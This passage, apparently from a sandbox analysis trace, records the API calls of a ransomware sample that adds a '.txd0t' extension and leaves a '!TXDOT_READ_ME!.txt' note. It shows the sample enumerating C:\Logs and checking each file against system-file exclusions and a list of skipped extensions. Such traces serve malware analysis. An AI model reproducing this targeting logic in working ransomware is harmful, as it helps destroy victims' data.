(psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="ntldr") returned -1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.958] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.958] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned=".evtx" [0071.958] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.958] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.958] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.958] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.958] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.958] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.958] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.958] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0071.958] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2=".") returned 1 [0071.958] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="..") returned 1 [0071.959] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.959] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.959] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" [0071.959] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned=".evtx" [0071.959] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="bootsect.bak") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="iconcache.db") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="thumbs.db") returned -1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2=" ransomware ") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2=" ransom ") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="debug.txt") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="boot.ini") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="desktop.ini") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="autorun.inf") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="ntuser.dat") returned -1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="ntldr") returned -1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="ntdetect.com") returned -1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="bootfont.bin") returned 1 [0071.959] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.959] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned=".evtx" [0071.959] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.959] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.959] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.959] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.959] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.959] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.959] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.959] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1b5b23, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1b5b23, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cAlternateFileName="MI1F5D~1.EVT")) returned 1 [0071.959] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2=".") returned 1 [0071.959] StrCmpW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="..") returned 1 [0071.959] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.959] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.959] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" [0071.960] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned=".evtx" [0071.960] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2=" ransom ") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="debug.txt") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="boot.ini") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="ntldr") returned -1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.960] PathFindExtensionW (pszPath="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned=".evtx" [0071.960] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.960] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.960] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.960] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.960] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.960] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.960] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.960] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74ac348, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74ac348, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-TWinUI%4Operational.evtx", cAlternateFileName="MIA925~1.EVT")) returned 1 [0071.960] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2=".") returned 1 [0071.960] StrCmpW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="..") returned 1 [0071.960] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.960] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.960] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-TWinUI%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" [0071.960] PathFindExtensionW (pszPath="Microsoft-Windows-TWinUI%4Operational.evtx") returned=".evtx" [0071.960] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.960] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2=" ransom ") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="debug.txt") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="boot.ini") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="ntldr") returned -1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-TWinUI%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.961] PathFindExtensionW (pszPath="Microsoft-Windows-TWinUI%4Operational.evtx") returned=".evtx" [0071.961] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.961] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.961] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.961] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.961] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.961] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.961] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.961] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50aff605, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50aff605, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-User Profile Service%4Operational.evtx", cAlternateFileName="MI4D4C~1.EVT")) returned 1 [0071.961] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2=".") returned 1 [0071.961] StrCmpW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="..") returned 1 [0071.961] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.961] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.961] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-User Profile Service%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" [0071.961] PathFindExtensionW (pszPath="Microsoft-Windows-User Profile Service%4Operational.evtx") returned=".evtx" [0071.961] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="bootsect.bak") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="iconcache.db") returned 1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="thumbs.db") returned -1 [0071.961] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2=" ransomware ") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2=" ransom ") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="debug.txt") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="boot.ini") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="desktop.ini") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="autorun.inf") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="ntuser.dat") returned -1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="ntldr") returned -1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="ntdetect.com") returned -1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="bootfont.bin") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-User Profile Service%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.962] PathFindExtensionW (pszPath="Microsoft-Windows-User Profile Service%4Operational.evtx") returned=".evtx" [0071.962] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.962] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.962] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.962] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.962] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.962] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.962] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.962] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50981e6e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50981e6e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cAlternateFileName="MI5FF0~1.EVT")) returned 1 [0071.962] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2=".") returned 1 [0071.962] StrCmpW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="..") returned 1 [0071.962] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.962] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.962] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" [0071.962] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned=".evtx" [0071.962] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="bootsect.bak") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="iconcache.db") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="thumbs.db") returned -1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2=" ransomware ") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2=" ransom ") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="debug.txt") returned 1 [0071.962] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="boot.ini") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="desktop.ini") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="autorun.inf") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="ntuser.dat") returned -1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="ntldr") returned -1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="ntdetect.com") returned -1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="bootfont.bin") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0071.963] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned=".evtx" [0071.963] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0071.963] FileTimeToSystemTime (in: lpFileTime=0x552f9ac, lpSystemTime=0x552f998 | out: lpSystemTime=0x552f998) returned 1 [0071.963] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f998, lpLocalTime=0x552f968 | out: lpLocalTime=0x552f968) returned 1 [0071.963] FileTimeToSystemTime (in: lpFileTime=0x552f9b4, lpSystemTime=0x552f978 | out: lpSystemTime=0x552f978) returned 1 [0071.963] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f978, lpLocalTime=0x552f988 | out: lpLocalTime=0x552f988) returned 1 [0071.963] FileTimeToSystemTime (in: lpFileTime=0x552f9bc, lpSystemTime=0x552f940 | out: lpSystemTime=0x552f940) returned 1 [0071.963] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f940, lpLocalTime=0x552f930 | out: lpLocalTime=0x552f930) returned 1 [0071.963] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0071.963] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2=".") returned 1 [0071.963] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="..") returned 1 [0071.963] StrCpyNW (in: psz1=0xecab68, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0071.963] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0071.963] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" [0071.963] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned=".evtx" [0071.963] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="bootsect.bak") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="iconcache.db") returned 1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="thumbs.db") returned -1 [0071.963] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2=" 